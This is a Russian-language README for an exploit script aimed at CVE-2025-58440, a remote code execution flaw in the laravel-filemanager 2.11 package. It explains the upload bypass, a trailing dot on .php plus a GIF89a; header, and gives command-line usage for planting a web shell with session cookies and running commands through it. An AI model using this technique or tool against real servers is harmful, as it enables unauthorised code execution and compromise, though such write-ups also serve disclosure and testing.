
Удаленное выполнение кода (RCE) через Polyglot File Attack и Null Byte Injection в Laravel FileManager
Удаленное выполнение кода (RCE) через полиморфную атаку файла и внедрение нулевого байта в Laravel FileManager
Пакет unisharp/laravel-filemanager версии 2.11 уязвим для удаленного выполнения кода (RCE) из-за неправильной проверки типа файла при загрузке. Уязвимость позволяет злоумышленнику загрузить вредоносный PHP-файл, замаскированный под изображение GIF, путем эксплуатации проверки расширения файла. В частности, злоумышленник может добавить точку (.) к расширению .php и включить заголовок GIF89a;, чтобы файл выглядел как изображение, обходя проверки валидации. Это позволяет злоумышленнику выполнить произвольный PHP-код на сервере, что приводит к удаленному выполнению кода (RCE).
python3 CVE-2025-58440.py <target> [--flags]
Laravel File Manager Exploit (CVE-2025-58440)
positional arguments:
target Target URL (e.g., 127.0.0.1:8000)
options:
-h, --help show this help message and exit
-C, --cookie COOKIE Session cookies
-d, --directory DIRECTORY Working directory (default: /tmp)
-f, --filename FILENAME Filename to upload (default: random)
-p, --payload COMMAND Command to execute through the webshell (e.g., 'id', 'whoami') (default: id)
python3 CVE-2025-58440.py 127.0.0.1:8000 -C "laravel-session=value" -p "whoami"
